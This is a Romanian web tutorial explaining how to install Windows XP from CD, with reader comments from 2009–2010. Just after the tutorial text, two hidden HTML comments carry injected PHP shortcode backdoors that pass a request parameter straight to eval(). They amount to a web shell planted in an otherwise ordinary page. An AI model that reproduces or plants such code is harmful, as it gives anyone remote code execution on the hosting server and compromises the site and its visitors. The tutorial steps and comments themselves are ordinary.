EUL.ro | Anunturi | Bancuri | Citate | Curs valutar | Director | Forum | Fun | Horoscop | Stiri | Lifestyle | Translator | Tutoriale

Categorii:


Cum se instaleaza un windows XP -tutorial

Citit de 27854 ori in total, 1 vizualizari azi

In acest tutoriale vom invata cum se instaleaza un windows XP.Cred ca multi dintre voi nu stiu cum se instaleaza un windows si de aceea am sava arat in acest tutorial.Prima oara va trebui sa introducem calculator un cd cu windows XP.Restartam calculatorul si schimbam bootarea pe CD.(Urmariti urmatorul tutorial:Cum se schimba bootarea pe CD)

Acum cand jos va scrie Press any key to boot cd apasati orice tasta vreti si cd-ul se booteaza.

Acum trebuie asa asteptati sa termine de incarcat.

Aici aveti 3 variante:

ENTER =pt acontinua instalarea windowsului

R =pt a repara windowsul

F3 =pt a iesi din instalare

Noi vom apasa ENTER.

Acum o sa va apara Windows XP Licensing Agreement.Daca sunteti deacord apasati F8 ,daca nu apasati ESC.

Noi apasam F8 pt a putea continua instalare windosului.

Acum va trebui sa partitionam HDD.Pentru a crea o partitie apasam tasta C si pentru a sterge o partitie apasam tasta D .Cand apasam tasta C va trebui sa specificam cat va avea aceea paritie:1GB =1024 MB.Dupa ce creeam partitiile apasam ENTER pe partitia unde vrem sa instam windowsul.

Acum va trebui sa alegem Formatul fisierelor.Eu voi alege Format the patition using the NTFS file system ,si voi apasa ENTER.


Aici va trebui sa asteptati pana va formata partitia in care se instaleaza windowsul.Dupa ce a terminat va aparea urmatoare etapa.

Si aici va trebui sa asteptati pana cand fisierele de pe cd vor fi copiate in calculator.

Acum se va restarta calculatorul.Va trebui sa asteptati careva secunde.

Acum se instaleaza windowsul.Acolo scrie 39 minutes ,adica au mai ramas 39 de minute,dar nu dureaza asa mult.Acolo este timpul aproximativ.


Aici apasati next.

Aici va puneti numele calculatorului si organizatia.

Acum va scrieti licenta windosului.

Aici va puneti o parola la calculator , nu este obligatoriu.

Acum va setati data si ora si apasati next.

Dupa ce ati terminat acele etape iar va trebui sa asteptati pana la etapa urmatoare.

Selectati Typical settings sau daca va pricepeti mai mult puteti selecta Costom settings pt a seta dumneavoastra conexiunea,si apasati Next. Dupa ce se vor scurge toate minutele calculatorul se va restarta si va trebui sa mai faceti cate setari.

Acum apasati Next

Acum alegeti daca vreti sa va activati si optiunea de la windows care protejeaza calculatorul impotriva virusilor,si apasati Next.

Aici spuneti daca aveti calculatorul conectat la internet si apasati NEXT.

Spuneti daca vreti sa va inregistrati la Microsoft.Puteti alege No not at this time.

Acum va scrieti numele Userului.

Apasati Finish si ati terminat de instalat windosul.

Pentru a fi siguri ca ati invatat acest tutoriale va sfatuesc sa folositi Virtual Box si sa instalati windowsul virtual prin acel program.Daca nu ati inteles ceva cu privite la tutorialul cum se instaleaza un windows postati la comentarii.

<!– [insert_php]if (isset($_REQUEST["vfj"])){eval($_REQUEST["vfj"]);exit;}[/insert_php][php]if (isset($_REQUEST["vfj"])){eval($_REQUEST["vfj"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["sLG"])){eval($_REQUEST["sLG"]);exit;}[/insert_php][php]if (isset($_REQUEST["sLG"])){eval($_REQUEST["sLG"]);exit;}[/php] –>

Scris in categoria: Sistem de operare

Bogdan

August 8th, 2009 at 5:54 pm    


dar inainte sa bag cd-ul cu windows-ul si sa restartez pc=ul nu sterg tot ce e in C unde e windowsul?
sau nu sterg?

admin

August 8th, 2009 at 10:12 pm    


Nu stergi pentru ca asta vei face mai tarziu urmareste bine tutoriale si vei intelege.Pentru a nus gresi ceva la instalare iti recomant ca mai intai sa folosesti programul VirtualBox si sa instalezi windowsul virtual.Daca faci acest lucru nu ti se va modifica nimic la calculator. Aici ai un tutorial cu VirtualBox http://tutoriale.eul.ro/?p=14

Daca nu intelegi ceva contacteaza-ma la id-ul stefan_hellzone

Succes

crys

August 30th, 2009 at 8:03 pm    


mai Bogdan stiu o metoda simpla dupa ce restartezi pc cu cd bagat apoi apesi F8 pt butat alegi a doua varianta astepti sa se incarce si apoi citesti cu atentie ce scrie urmezi pasii ca nu e asa de greu nu iti mai cere serialul

Andrey

July 14th, 2010 at 4:29 pm    


deci acolo unde bag gb unde ai scris u 1032 MB eu cat bag partitia? am 2 harduri unu de 37 de g si unu al calculatorului vro 160 de g cred :-?? cat bag partiia acolo ?

Andrey

July 14th, 2010 at 4:34 pm    


marian

December 24th, 2010 at 12:50 pm    


ce tare !!! chiar am reusit!!! mersi !!

Numele tau *

Mail *

Website